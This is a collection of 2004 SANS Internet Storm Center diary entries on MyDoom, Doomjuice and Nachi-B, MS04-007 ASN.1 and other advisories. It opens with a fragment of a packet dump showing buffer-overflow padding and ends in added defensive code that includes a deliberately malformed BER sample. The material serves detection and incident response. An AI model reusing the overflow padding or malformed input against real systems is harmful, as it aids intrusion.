0x0280 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0290 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x02a0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x02b0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x02c0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x02d0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x02e0 4141 4141 4141 0055 006e 0069 0078 0000 AAAAAA.U.n.i.x..
0x02f0 0053 0061 006d 0062 0061 0000 00 .S.a.m.b.a...


Handler on Duty: Mike Poor [ mike@intelguardians.com ]

0 Comments

Published: 2004-02-13

Windows Source Code; How to Detect ASN.1 Exploits

Windows Source Code. As most of the infosec community knows, the big buzz over the past 24 hours was the reported leakage of Windows 2000 and Windows NT 4.0 source code. We are only mentioning it in the diary since we have received numerous requests yesterday and today for copies of the code or pointers to where it is located. The SANS Internet Storm Center does not condone unauthorized duplication of copyrighted software, and respects Microsoft's desire to protect their intellectual property.



How to Detect ASN.1 Exploits. MS04-007 contains details on a significant flaw in the .dll file that handles the parsing of Abstract Syntax Notation One (ASN.1) Basic Encoding Rules (BER). Similar ASN.1 BER implementation flaws in SNMP were the subject of a University of Oulu (Finland) study in 2001, which was published in early 2002. ASN.1 is a formal language for abstractly describing messages to be exchanged among an extensive range of applications such as:


- Cellular phone, 800-number phone call routing, and Signaling System 7 (SS7)

- Air traffic control systems

- Package tracking

- SCADA systems

- SNMP, LDAP, SSL, and other common protocols

- X.9 financial transaction protocols

- RSA public key cryptographic standards

- T.120, H.323, X.400, and X.500 standards


The flaws in Microsoft's implementation of the ASN.1 encoding rules are a reminder that other software vendors and developers need to continue reviewing their own implementations to ensure that they have not overlooked potential errors and flaws.


In the past few days the ISC was asked if there are ways to detect exploits directed at ASN.1 encoding rule implementation vulnerabilities. The short answer to that question is, "it depends." It depends on the specific code module that has the flaw and the services or applications that depend on it. Any of the applications that depend on the flawed Microsoft .dll file are vulnerable to an exploit, but the form of that exploit will depend on the way the application interacts with the .dll file.



A note to the ladies - Happy Valentine's Day! (Guys - don't forget!)



Marcus H. Sachs

The SANS Institute

Handler on duty



Published: 2004-02-12

Nachi-B Worm, Microsoft XML

Nachi B

'Nachi-B' (aka W32.Welchia.B.Worm) started to circulate yesterday. Like Nachi-A, which was released last August, Nachi-B uses the RPC DCOM vulnerability and the IIS WebDAV vulnerability to enter a system.

However, Nachi-B adds the Workstation service buffer overflow (MS03-049) and the Locator service vulnerability (MS03-001) to its arsenal.

In addition to patching the RPC DCOM vulnerability on some versions of Windows, it removes files left behind by MyDoom.

Infected machines will generate traffic to port 135 tcp, 80 tcp, 139 tcp and 445 tcp.

Our data illustrates the spread of this virus. See the increase in traffic to port 80: http://isc.sans.org/port_details.html?port=80 , and to port 445: http://isc.sans.org/port_details.html?port=445 over the last two days. Approximately 70,000 additional sources are scanning these two ports.

For additional information, see these summaries:

http://securityresponse.symantec.com/avcenter/venc/data/w32.welchia.b.worm.html

http://www.sophos.com/virusinfo/analyses/w32nachib.html

http://www.f-secure.com/v-descs/welchi_b.shtml

Microsoft XML Patch

Microsoft patch MS04-004 ("Cumulative Security Update for Internet Explorer"), which was released earlier in February, removed the ability to embed credentials in http and https URLs. However, this patch also removed the ability to pass a username and password to XMLHTTP.open calls.

The exact behavior is explained here: http://support.microsoft.com/default.aspx?scid=kb;en-us;832414

A fix was released to solve the problem with XMLHTTP.open calls.

-------------------------

Johannes Ullrich, SANS Institute, jullrich_AT_sans.org

Feedback: http://isc.sans.org/contact.html


Published: 2004-02-11

DoomJuice variant / AOL IM issue / ISC webcast / Microsoft Patches

DoomJuice New Variant



A new variant of DoomJuice was discovered today. According to the F-Secure analysis, this new variant also targets the Microsoft website: "This new variant tries to improve the Distributed Denial-of-Service attack on www.microsoft.com".
This time it sets random HTTP headers, chosen from the following:

User-Agent: Mozilla/4.0

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)

User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT 5.0)

Accept-Encoding: gzip, deflate

Accept-Language: en

Accept-Language: en-us




A packet capture sample, by the ISC Handler Lenny Zeltser:

02/10-23:17:22.587900 192.168.232.136:2875 -> 192.168.232.135:80
TCP TTL:128 TOS:0x0 ID:9216 IpLen:20 DgmLen:243 DF
***AP*** Seq: 0x7DC55 Ack: 0x7CA887AD Win: 0x2238 TcpLen: 20
47 45 54 20 2F 20 48 54 54 50 2F 31 2E 31 0D 0A GET / HTTP/1.1..
41 63 63 65 70 74 3A 20 2A 2F 2A 0D 0A 41 63 63 Accept: */*..Acc
65 70 74 2D 4C 61 6E 67 75 61 67 65 3A 20 65 6E ept-Language: en
2D 75 73 0D 0A 41 63 63 65 70 74 2D 45 6E 63 6F -us..Accept-Enco
64 69 6E 67 3A 20 67 7A 69 70 2C 20 64 65 66 6C ding: gzip, defl
61 74 65 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A ate..User-Agent:
20 4D 6F 7A 69 6C 6C 61 2F 34 2E 30 20 28 63 6F  Mozilla/4.0 (co
6D 70 61 74 69 62 6C 65 3B 20 4D 53 49 45 20 36 mpatible; MSIE 6
2E 30 3B 20 57 69 6E 64 6F 77 73 20 4E 54 20 35 .0; Windows NT 5
2E 31 29 0D 0A 48 6F 73 74 3A 20 77 77 77 2E 6D .1)..Host: www.m
69 63 72 6F 73 6F 66 74 2E 63 6F 6D 3A 38 30 0D icrosoft.com:80.
0A 43 6F 6E 6E 65 63 74 69 6F 6E 3A 20 4B 65 65 .Connection: Kee
70 2D 41 6C 69 76 65 0D 0A 0D 0A p-Alive....




According to Lenny, the new DoomJuice uses a different file name when copying itself locally, and a different registry key:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\NeroCheck
C:\WINDOWS\SYSTEM\regedit.exe

Note that the real Windows-supplied regedit.exe is in C:\WINDOWS, and is not
overwritten by the new DoomJuice.


The attack against the Microsoft website is set to start after February 12th.


Reference: http://www.f-secure.com/v-descs/doomjuiceb.shtml




ISC Webcast



Today's ISC Webcast, the Monthly Threat Update, which covered some of this month's issues such as MyDoom, the Microsoft patches and the relevant numbers for the month, will soon be available at http://www.sans.org/webcasts/



Mailbag


Some users are asking us about a possible DDoS against the Microsoft Windows Update website, because access to it has been slow.
There is no indication of such activity; this symptom could instead be a direct result of the Microsoft Security Bulletins released yesterday with three new updates.


Reference: http://isc.sans.org/diary.html?date=2004-02-10



AOL IM pseudo-virus-adware



We are receiving some reports about the so-called "IM virus", as mentioned in yesterday's diary (http://isc.sans.org/diary.html?date=2004-02-10).


In short, the user receives a link (www.wgutv.com/osama_capture.php?XxCC); clicking it leads to a website that prompts the user to install a "News Player", which also installs other tools on the computer and sends the same message to everyone on the user's buddy list.



The software's Terms and Privacy Policy contains the following disclaimer:


/*

Services; Modifications to Your Instant Messaging Client.
The Software provides you the opportunity to access Content for no charge. In return for the right to access this Content, you acknowledge and agree that the Software contains additional software products provided to PSD Tools by its suppliers which will periodically deliver additional Content such as, but not limited to, advertisements and promotional messages to your Computer and programs that may alter your home page to offer you Content. In addition, the Software will interoperate with your current instant messaging client so as to permit the automatic sending of advertising messages originating from your Computer to your contact or “buddy” list regarding Content offered by PSD Tools or its suppliers. If you desire to stop this activity, you may elect to stop the messages by navigating to the “buddylinks.net” entry in your “Start Menu”, selecting the “buddylinks.net Configuration” item, and unchecking the appropriate option. You may also refer to PSD Tools’ website at http://www.psdtools.com for an uninstaller.

*/



The installer cannot be found at http://www.psdtools.com , but on the http://www.buddylinks.net/support.php page.


So, as a best practice, be careful about allowing anything to be installed on your computer.

Microsoft Patches


Just a reminder about the Microsoft patches released and posted in yesterday's diary.

Reference: http://isc.sans.org/diary.html?date=2004-02-10

---------------------------------------------------

Handler on duty: Pedro Bueno


Published: 2004-02-10

Microsoft Releases Updates (1 - Critical, 2 - Important)

Microsoft has just released information on three updates:



The most critical of the three is entitled "ASN.1 Vulnerability Could Allow Code Execution (828028)" and affects all Windows operating systems based on the NT core (NT, 2000, XP, and Server 2003):



http://www.microsoft.com/technet/treeview/?url=/technet/security/bulletin/MS04-007.asp


Essentially, multiple possible overflow conditions exist within the ASN.1 implementation in Microsoft's MSASN1.DLL.
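The detection question in the February 13 entry above ("it depends") and the overflow conditions in MSASN1.DLL described here both come down to how a decoder treats the BER length field. As an added example, not ISC's or Microsoft's code, here is a minimal BER TLV walker that applies the length sanity checks a hardened decoder or an IDS preprocessor would use; the two sample encodings are constructed.

```python
# Added example, not ISC's or Microsoft's code: a minimal ASN.1 BER TLV walker
# with the sanity checks a hardened decoder or an IDS preprocessor would put on
# the length field, where trusting the encoded length drives a decoder into overflow.
from typing import List, Tuple

# One finding: (offset of the suspect TLV, reason)
Finding = Tuple[int, str]


def _read_length(buf: bytes, pos: int) -> Tuple[int, int, str]:
    """Decode one BER length at buf[pos]; return (length, new_pos, problem).

    problem is '' when the encoding is sane. BER length forms:
      0x00-0x7F          short form, the octet is the length
      0x81-0x84 + bytes  long form, 1-4 following octets hold the length
      0x80               indefinite form (end-of-contents terminated)
      0xFF               reserved
    """
    if pos >= len(buf):
        return 0, pos, "truncated before length octet"
    first = buf[pos]
    pos += 1
    if first < 0x80:
        return first, pos, ""
    if first == 0x80:
        return 0, pos, "indefinite length (not allowed in DER, risky in BER)"
    if first == 0xFF:
        return 0, pos, "reserved length octet 0xFF"
    nbytes = first & 0x7F
    if nbytes > 4:
        # No on-wire buffer needs more than 4 length octets; decoders that
        # accumulate longer encodings into a 32-bit integer wrap around.
        return 0, pos, f"long-form length uses {nbytes} octets"
    if pos + nbytes > len(buf):
        return 0, pos, "truncated inside long-form length"
    length = int.from_bytes(buf[pos:pos + nbytes], "big")
    pos += nbytes
    if length < 0x80 or length < (1 << (8 * (nbytes - 1))):
        # A value that fits in fewer octets was padded: non-minimal encoding.
        return length, pos, "non-minimal long-form length"
    return length, pos, ""


def check_ber(buf: bytes) -> List[Finding]:
    """Walk the top-level TLVs in buf. An empty list means every length is
    sanely encoded and fits inside the buffer; otherwise the first suspect
    TLV is reported and the walk stops."""
    findings: List[Finding] = []
    pos = 0
    while pos < len(buf):
        tag_pos = pos
        tag = buf[pos]
        pos += 1
        if (tag & 0x1F) == 0x1F:  # high-tag-number form: skip continuation octets
            while pos < len(buf) and buf[pos] & 0x80:
                pos += 1
            pos += 1
        length, pos, problem = _read_length(buf, pos)
        if problem:
            findings.append((tag_pos, problem))
            break
        if length > len(buf) - pos:
            findings.append((tag_pos, f"length {length} exceeds remaining {len(buf) - pos} bytes"))
            break
        pos += length
    return findings


# Constructed samples: a well-formed SEQUENCE { INTEGER 5 } and one whose long-form
# length claims 0xFFFFFFFF octets, a value that wraps a 32-bit size once a header is added.
GOOD = bytes.fromhex("3003020105")
OVERSIZED = bytes.fromhex("3084ffffffff0201")
```

Only top-level TLVs are walked; a full checker would recurse into constructed types (tag bit 0x20 set) with the same checks.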



Affected software that uses this library includes:

   - Microsoft Internet Explorer

   - Outlook Express

   - Outlook

   - IIS (using SSL as in https)

   - Microsoft's Kerberos implementation

   - NTLMv2 authentication

   - Third party software using encryption certificates



This is a critical issue and should be addressed immediately; exploits are expected soon.



Additional Information on the ASN.1 issues can be found at eEye Digital Security's site:


http://www.eeye.com/html/Research/Advisories/AD20040210.html


and


http://www.eeye.com/html/Research/Advisories/AD20040210-2.html


--------------------------------------------------------------------



Listed as "Important" are two additional updates, "Vulnerability in the Windows Internet Naming Service (WINS) Could Allow Code Execution (830352)":



http://www.microsoft.com/technet/treeview/?url=/technet/security/bulletin/MS04-006.asp


(This is a vulnerability in the WINS Service on Windows NT Server, NT Terminal Server, Windows 2000 Server and Windows Server 2003. This vulnerability is listed as "important" by Microsoft.)



and "Vulnerability in Virtual PC for Mac could lead to privilege elevation (835150)":


http://www.microsoft.com/technet/treeview/?url=/technet/security/bulletin/MS04-005.asp


(The target of this vulnerability is not in widespread use and could not be effectively targeted, hence Microsoft's listing it as "important." If you know someone using this software on the Mac, please notify them, because they may not be aware of Microsoft's information distribution channels.)



--------------------------------------------------------------------



Other Stuff


We have received reports of a "download this cool game" link circulating on AOL Instant Messenger. The game, when downloaded and executed, sends IMs to your contacts, telling them to "download this cool game". And so on, and so on, and so on...


We're not entirely sure if this is to be considered a "virus" or simply "annoying IM spam."



--------------------------------------------------------------------


Handler on duty: Tom Liston - http://www.labreatechnologies.com


Published: 2004-02-09

Doomjuice/MyDoom.C, Sharp Increase in port 445 and 139 scans

Doomjuice/MyDoom.C

A new worm, named Doomjuice and MyDoom.C by various AV vendors, was identified. It spreads by exploiting the backdoor left by MyDoom.A and MyDoom.B. After infecting a system, it leaves a copy of the MyDoom.A source in a file named 'sync-src-1.00.tbz'. Doomjuice is also set to perform a DDoS against www.microsoft.com.

More information and removal instructions are available at:

http://www.lurhq.com/mydoom-c.html
http://www.f-secure.com/v-descs/doomjuice.shtml
http://www.sarc.com/avcenter/venc/data/w32.hllw.doomjuice.html

Port 445 and 139

A sharp increase in the number of connections to ports 445 and 139 has been reported. The source of these has yet to be determined.


MyDoom Hype Fueled By Antivirus Software Vendors

Computerworld has a good article regarding the media hype that has been generated around the MyDoom worms. MyDoom is credited as the fastest-spreading worm in history, but has not caused nearly the disruption of Slammer and Blaster. The article is here:

http://www.computerworld.com/securitytopics/security/story/0,10801,89649,00.html

Handler on Duty: Dave Brookshire


Published: 2004-02-08

Port 39999; Possible Vesser/W32.HLLW.Deadhat activity

For the most part, it was a pretty quiet day, with just the normal noise on the Internet. Here are some things:

Port 39999

Activity to port 39999 was reported today. It appears these may be attempts to connect to a Trojan called Trojan.Mitglieder.B, which sets up a proxy on this port and is used to send spam. Once a system is infected, the Trojan notifies certain sites of the compromise. For more information see

http://www.symantec.com/avcenter/venc/data/trojan.mitglieder.b.html



**As a side note, don't forget that many folks connecting to the Internet use DHCP and, as a result, they often inherit the IP of someone offering services or infected by malicious code that listens on a certain port. You may therefore see unusual and possibly persistent connection attempts to that port on your box.**

Possible Vesser/W32.HLLW.Deadhat activity

More reports of activity on ports 3127, 3128 and 1080 are coming in. This seems to be consistent with Vesser/W32.HLLW.Deadhat worm activity. For more information on this see the diary entry from 7 February 04.

http://isc.sans.org/diary.html?date=2004-02-07


Lorna Hutcheson


Published: 2004-02-07

Port 1080, 3127 and 3128; Apache-SSL Optional Client Certificate Vulnerability

Port 1080, 3127 and 3128

There has been an increase in attempts directed at ports 1080, 3127 and 3128 over the past few days. At this point, no firm conclusion can be drawn about this activity.


F-Secure reported a new worm (Vesser) that might be responsible for this activity. This worm spreads through the MyDoom backdoor and the SoulSeek P2P program. As reported, it removes the MyDoom backdoor on infected machines. It contains an IRC-based backdoor and an HTTP proxy:

http://www.f-secure.com/v-descs/vesser.shtml


Symantec's W32.HLLW.Deadhat writeup:

http://securityresponse.symantec.com/avcenter/venc/data/w32.hllw.deadhat.html

NAI also calls it Deadhat:

http://vil.nai.com/vil/content/v_101000.htm

Let us know if you have further details on this worm.


Apache-SSL optional client certificate vulnerability

A vulnerability has been reported in the Apache-SSL optional client certificate configuration. If configured with SSLVerifyClient set to 1 or 3 (client certificates optional) and SSLFakeBasicAuth, Apache-SSL 1.3.28+1.52 and all earlier versions permit a client to use real basic authentication to forge a client certificate.

The vendor has issued a fixed version of Apache-SSL (1.3.29+1.53):

http://www.apache-ssl.org/advisory-20040206.txt


Published: 2004-02-05

Flaws in Checkpoint and RealOne; MyDoom Update; AntiVirus Software; Data Call

Checkpoint Product Flaws. According to Internet Security Systems (ISS), there are two new vulnerabilities in Checkpoint products: a buffer overflow in the ISAKMP processing component for both the Checkpoint VPN-1 server and Checkpoint VPN clients, and several remotely exploitable format string vulnerabilities in the HTTP Application Intelligence component of Firewall-1. Details about both are on ISS' web site at http://xforce.iss.net/xforce/alerts/id/162 and http://xforce.iss.net/xforce/alerts/id/163 .


(An interesting point for graduates of the SANS Hacker Techniques, Exploits and Incident Handling track - remember the class on format string attacks? Now you really DO have something you can talk about this weekend at a cocktail party!)


As far as we know there are no exploits for either of these vulnerabilities in the wild. Unfortunately we have found that many of the Internet search engines will locate installations of Firewall-1 if the HTTP proxy is active. This puts those sites at extreme risk for attack if they are not quickly updated.


RealOne Vulnerable to Remote Exploits. Real Networks released a bulletin on Wednesday detailing vulnerabilities in their RealOne player. Details and instructions for upgrading are on the web at http://www.service.real.com/help/faq/security/040123_player/EN/


MyDoom Virus Source Tracing. As we all know, the MyDoom virus uses forged source addresses, making traceback a bit harder than just looking at the FROM address. If you examine the SMTP header of one of these emails, you might find that the original IP address of the sender is present, plus the message ID if the sender uses a typical email client. Both of these items of information can be used to track down computers that remain infected.
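Doing this tracing by hand over a mailbox of bounces gets old quickly. As an added example, not ISC's code, here is a small header walker that pulls the earliest untrusted hop's IP and the Message-ID out of a raw header block; the header block and the set of "our own relay" addresses are constructed, and the address found is only as trustworthy as the relay that wrote that Received: line.

```python
# Added example, not ISC's code: find the originating IP and Message-ID in the
# headers of a MyDoom-style message whose From: address is forged. Received:
# lines are prepended by each relay, so the last one is the earliest hop; the
# first hop not written by one of our own relays is the best lead to the sender.
import re
from email import message_from_string
from typing import Optional, Set, Tuple

IPV4 = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")


def trace_origin(raw_headers: str, our_relays: Set[str]) -> Tuple[Optional[str], Optional[str]]:
    """Return (origin_ip, message_id). our_relays holds the addresses of our
    own mail relays (assumed values); hops whose connecting client is one of
    them are internal hand-offs and are skipped."""
    msg = message_from_string(raw_headers)
    for hop in reversed(msg.get_all("Received", [])):
        m = IPV4.search(hop)  # first address in "from host ([ip]) by ..."
        if m and m.group(1) not in our_relays:
            return m.group(1), msg.get("Message-ID")
    return None, msg.get("Message-ID")


# Constructed header block: our MX (10.0.0.5) relayed a message that was
# submitted directly by 192.0.2.77 (a documentation-range address standing in
# for an infected host); the From: line is the worm's forgery.
SAMPLE = """Received: from mx.example.org (mx.example.org [10.0.0.5])
        by inbox.example.org with ESMTP id abc123; Thu, 5 Feb 2004 09:12:00 -0500
Received: from [192.0.2.77] (helo=workgroup-pc)
        by mx.example.org with SMTP id 4f3a; Thu, 5 Feb 2004 09:11:58 -0500
From: someone@forged.example.com
To: user@example.org
Subject: hello
Message-ID: <1075983118.00038@workgroup-pc>
"""
```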


ISP Port Blocking. Because of the MyDoom virus, some ISPs are blocking ports 3127-3198. This affects Windows users since Windows often uses this port range as the source port for outgoing connections. If you are using Windows, and ping, traceroute, and other utilities "see" the Internet but your browser and other applications cannot, this might be the cause.


AntiVirus Client Software. One more plea to the antivirus software vendors: PLEASE turn off the auto-response feature! We have found that in addition to the corporate email systems sending autoresponses to the FROM addressee of infected emails, some popular antivirus clients also do this. The result is an increase in the amount of pointless error messages, and an increase in confused consumers who do not understand why they are getting the warnings from other computers.


Request for Data. A reader has asked if others are seeing an increase in activity directed toward tcp/1080 and 3128. Our data shows an increase in targets over the past few days. Please check your logs and if you see the same increase and have any ideas about the source please drop us a note. Likewise, tcp/1024 is showing an interesting increase.



Marcus H. Sachs

The SANS Institute

Handler on Duty


Published: 2004-02-04

Port 12345 / NAT fingerprint

Port 12345


We noticed an increase in the number of targets and records for port 12345. While the number of sources is still stable, this traffic is considered suspicious.
The graph of this activity can be found here: http://www.dshield.org/port_report.php?port=12345

We are requesting some packet dumps of this activity. Tcpdump/Windump format is preferable.





NAT devices fingerprint


A request for data was posted today on the Intrusions list. Johannes Ullrich, ISC's CTO, is requesting help with fingerprinting various NAT devices based on the source ports they use.


If you have a NAT device, please hit this page:
http://isc.sans.org/nattest.html

It will tell you your source port and allow you to fill in the NAT device you use, so the result can be emailed to the ISC database.

-------------------------------------------------------------------------------

Handler on duty: Pedro Bueno


Published: 2004-02-03

MyDoom.A Timeline, MyDoom.B DDoS a Non-Event

Not a whole lot of stuff going on today... MyDoom.A is still filling in-boxes, while MyDoom.B, which was initially greeted with dire predictions, seems to have been a dud.



If you're involved in the cleanup of an infected system, it is important to remember that beyond simply spamming the world, MyDoom.A opens a backdoor starting at port 3127 TCP. Any infected system directly connected to the Internet could have been further compromised and should seriously be considered as a candidate for a complete reinstall.



MyDoom.A Timeline



Panda Software has published a MyDoom.A timeline which can be found at:



http://www.net-security.org/virus_news.php?id=359



While we have heard many theories about possible mechanisms behind the rapid spread of MyDoom, examination of compromised machines and the code itself does not indicate a cause beyond the simple fact that even in today's Internet aware world, people still execute attachments. User education needs to become a priority.





MyDoom.B DDoS a Non-Event



The February 3rd deadline for the MyDoom.B virus DDoS against www.microsoft.com passed without having any effect on the availability of Microsoft's website. The website of The SCO Group (www.sco.com), apparently the target of a DDoS by MyDoom.A, is still unavailable. The "A" record for the "www" server was removed from the "sco.com" DNS entry on February 1 in an attempt to mitigate the expected attack.



----------------------------------------------------------------

Handler on Duty: Tom Liston - http://www.labreatechnologies.com


Published: 2004-02-02

Microsoft Releases IE Cumulative Patch (MS04-004)


Microsoft Releases Internet Explorer Cumulative Patch (MS04-004)

Earlier today Microsoft released patches for Internet Explorer versions 5.01, 5.5, and 6.0. This cumulative patch replaces the one provided by Microsoft Security Bulletin MS03-048.
The Bulletin is located at:

http://www.microsoft.com/technet/security/Bulletin/MS04-004.asp

It is reported that this update eliminates a vulnerability in the cross-domain security model, a vulnerability involving drag-and-drop operations during dynamic HTML (DHTML) events, and the vulnerability involving the parsing of URLs that contain special characters. Each of these vulnerabilities is rated either Critical or Important for any version of Windows prior to Windows Server 2003. They are listed as Moderate or Important for Windows Server 2003.

In addition, the basic authentication features of Internet Explorer have been modified to remove the handling of user names and passwords in HTTP, HTTPS, and XMLHTTP URLs. This change may have a dramatic effect on end users who bookmark or otherwise store their passwords as part of the URL. Though this change does improve security, end users may complain about the loss of this ability.

For more information on the URL parsing vulnerability please see:

http://isc.sans.org/diary.html?date=2003-12-23
Internet Storm Center

Scott Fendley - Handler on duty
